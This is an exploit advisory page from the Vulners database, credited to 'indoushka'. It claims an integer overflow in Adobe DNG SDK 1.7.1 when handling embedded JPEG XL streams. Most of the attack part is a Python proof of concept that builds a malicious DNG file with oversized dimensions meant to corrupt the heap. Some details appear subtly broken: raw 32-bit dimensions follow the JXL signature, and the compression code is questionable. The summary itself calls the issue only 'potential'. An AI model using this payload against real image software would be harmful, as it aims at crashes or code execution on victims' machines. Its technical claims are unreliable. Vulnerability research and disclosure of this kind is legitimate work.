Vulners
Lucene search
📄 Adobe DNG SDK 1.7.1 2410 Integer Overflow
=============================================================================================================================================
| # Title : Adobe DNG SDK v 1.7.1 2410 Files Containing JPEG XL Streams Due to Improper Dimension Validation Integer Overflow |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://helpx.adobe.com/camera-raw/digital-negative.html |
=============================================================================================================================================
[+] Summary : A potential security issue may arise when processing DNG (Digital Negative) files that embed JPEG XL (JXL) compressed image streams if image dimensions are not properly validated before memory allocation.
In this scenario, specially crafted width and height values are embedded inside the JPEG XL stream and referenced within the DNG/TIFF structure. If a vulnerable decoder performs unchecked arithmetic operations (e.g., width × height) using 32-bit integers or without overflow protection, this may lead to:
Integer overflow
Incorrect memory allocation size
Heap corruption
Out-of-bounds memory writes
Application crash or potential code execution
The issue typically occurs when:
The parser trusts image metadata values.
Multiplication is performed without verifying against SIZE_MAX.
The allocated buffer size is smaller than the required pixel storage.
This type of vulnerability is common in image parsing libraries when handling untrusted media files and highlights the importance of strict bounds checking and safe arithmetic operations during image decoding.
[+] POC :
import struct
def create_malicious_jxl_stream():
"""
Builds a minimal JXL header containing dimensions that cause an Overflow.
Target dimensions: 1431655766 (Width) and 715827883 (Height).
"""
signature = b'\xff\x0a'
width = struct.pack("<I", 1431655766)
height = struct.pack("<I", 715827883)
extra_data = b'\x00' * 100
return signature + width + height + extra_data
def generate_dng_exploit(filename="exploit_poc.dng"):
print(f"[*] Creating malicious DNG file: {filename}")
header = struct.pack("<HH", 0x4949, 42)
ifd_offset = struct.pack("<I", 8)
ifd_entries_count = struct.pack("<H", 3)
tag_compression = struct.pack("<HHII", 259, 3, 1, 50007)
tag_width = struct.pack("<HHII", 256, 4, 1, 1431655766)
data_offset = 8 + 2 + (12 * 3) + 4
tag_strip_offsets = struct.pack("<HHII", 273, 4, 1, data_offset)
next_ifd = struct.pack("<I", 0)
jxl_data = create_malicious_jxl_stream()
with open(filename, "wb") as f:
f.write(header)
f.write(ifd_offset)
f.write(ifd_entries_count)
f.write(tag_compression)
f.write(tag_width)
f.write(tag_strip_offsets)
f.write(next_ifd)
f.write(jxl_data)
print(f"[+] Success! File saved. Use 'dng_validate {filename}' to test.")
if __name__ == "__main__":
generate_dng_exploit()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Mar 2026 00:00Current
6Medium risk
Vulners AI Score6